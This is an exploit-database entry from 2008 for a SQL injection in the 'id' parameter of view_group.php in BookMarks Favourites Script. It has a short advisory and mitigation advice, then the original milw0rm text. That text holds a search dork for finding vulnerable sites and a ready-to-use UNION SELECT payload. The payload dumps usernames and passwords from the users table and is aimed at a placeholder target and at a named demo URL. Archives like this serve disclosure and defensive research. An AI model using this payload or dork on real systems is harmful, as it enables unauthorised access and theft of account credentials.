BookMarks Favourites Script (view_group.php id) Remote SQL Injection Vulnerability

vendor:

BookMarks Favourites Script

by:

Hussin X

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: BookMarks Favourites Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

BookMarks Favourites Script (view_group.php id) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in the BookMarks Favourites Script. An attacker can exploit this vulnerability to inject malicious SQL queries into the application, allowing them to gain access to sensitive information stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter in the 'view_group.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL queries to the vulnerable script. This can result in the execution of arbitrary SQL commands, allowing the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be configured to use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| BookMarks Favourites Script (view_group.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|
|    Home :  IQ-SecuritY  >   WwW.IQ-ty.CoM
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                    |
|
| script : http://www.quidascript.com/index.php?main_page=product_info&products_id=77
|
| DorK   : inurl:view_group.php?id=
|___________________________________________________|


Exploit:

www.[target].com/Script/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users--



Demo :

http://www.quidascript.com/bookmarks/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users--





____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
|______________________________________________________________________


                                  Im IRAQi    |    Im TrYaGi

# milw0rm.com [2008-09-30]